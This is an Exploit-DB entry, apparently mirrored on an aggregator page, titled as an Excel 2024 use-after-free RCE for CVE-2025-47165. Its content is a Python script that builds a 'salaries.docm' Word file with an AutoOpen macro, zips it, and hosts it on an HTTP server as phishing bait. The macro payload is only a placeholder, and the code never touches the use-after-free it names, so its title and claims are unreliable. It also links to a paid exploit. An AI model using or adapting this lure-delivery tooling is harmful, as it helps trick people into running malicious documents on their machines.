Microsoft Excel 2024 Use after free – Remote Code Execution (RCE)

• Exploit Database
• 30 阅读

• 作者： nu11secur1ty
  日期： 2025-06-26
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/52343/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157

  # Exploit Title: Microsoft Excel 2024 Use after free - Remote Code Execution (RCE) # Author: nu11secur1ty # Date: 06/24/2025 # Vendor: Microsoft # Software: https://www.microsoft.com/en/microsoft-365/excel?market=af # Reference: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47165 # CVE: CVE-2025-47165 # Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise   # Description: The attacker can trick any user into opening and executing their code by sending a malicious DOCM file via email or a streaming server. After the execution of the victim, his machine can be infected or even worse than ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE MACROS OPTIONS FROM YOUR OFFICE 365!!!   #!/usr/bin/python   import os import sys import pythoncom from win32com.client import Dispatch import http.server import socketserver import socket import threading import zipfile   PORT = 8000 DOCM_FILENAME = "salaries.docm" ZIP_FILENAME = "salaries.zip" DIRECTORY = "."   def create_docm_with_macro(filename=DOCM_FILENAME): pythoncom.CoInitialize() word = Dispatch("Word.Application") word.Visible = False   try: doc = word.Documents.Add() vb_project = doc.VBProject vb_component = vb_project.VBComponents("ThisDocument")   macro_code = &apos;&apos;&apos; Sub AutoOpen() //YOUR EXPLOIT HERE // All OF YPU PLEASE WATCH THE DEMO VIDEO // Best Regards to packetstorm.news and OFFSEC End Sub &apos;&apos;&apos;   vb_component.CodeModule.AddFromString(macro_code)   doc.SaveAs(os.path.abspath(filename), FileFormat=13) print(f"[+] Macro-enabled Word document created: {filename}")   except Exception as e: print(f"[!] Error creating document: {e}") finally: doc.Close(False) word.Quit() pythoncom.CoUninitialize()   def zip_docm(docm_path, zip_path): with zipfile.ZipFile(zip_path, &apos;w&apos;, compression=zipfile.ZIP_DEFLATED) as zipf: zipf.write(docm_path, arcname=os.path.basename(docm_path)) print(f"[+] Created ZIP archive: {zip_path}")   def get_local_ip(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: s.connect(("8.8.8.8", 80)) ip = s.getsockname()[0] except Exception: ip = "127.0.0.1" finally: s.close() return ip   class Handler(http.server.SimpleHTTPRequestHandler): def __init__(self, *args, **kwargs): super().__init__(*args, directory=DIRECTORY, **kwargs)   def run_server(): ip = get_local_ip() print(f"[+] Starting HTTP server on http://{ip}:{PORT}") print(f"[+] Place your macro docm and zip files in this directory to serve them.") print(f"[+] Access the ZIP file at: http://{ip}:{PORT}/{ZIP_FILENAME}") with socketserver.TCPServer(("", PORT), Handler) as httpd: print("[+] Server running, press Ctrl+C to stop") httpd.serve_forever()   if __name__ == "__main__": if os.name != "nt": print("[!] This script only runs on Windows with MS Word installed.") sys.exit(1)   print("[*] Creating the macro-enabled document...") create_docm_with_macro(DOCM_FILENAME)   print("[*] Creating ZIP archive of the document...") zip_docm(DOCM_FILENAME, ZIP_FILENAME)   print("[*] Starting HTTP server in background thread...") server_thread = threading.Thread(target=run_server, daemon=True) server_thread.start()   try: while True: pass# Keep main thread alive except KeyboardInterrupt: print("\n[!] Server stopped by user.")     ```   # Reproduce: [href](https://www.youtube.com/watch?v=CSb76-OG-Tg)   # Buy an exploit only: [href](https://satoshidisk.com/pay/COiBVA)   # Time spent: 01:37:00     -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>         --   System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>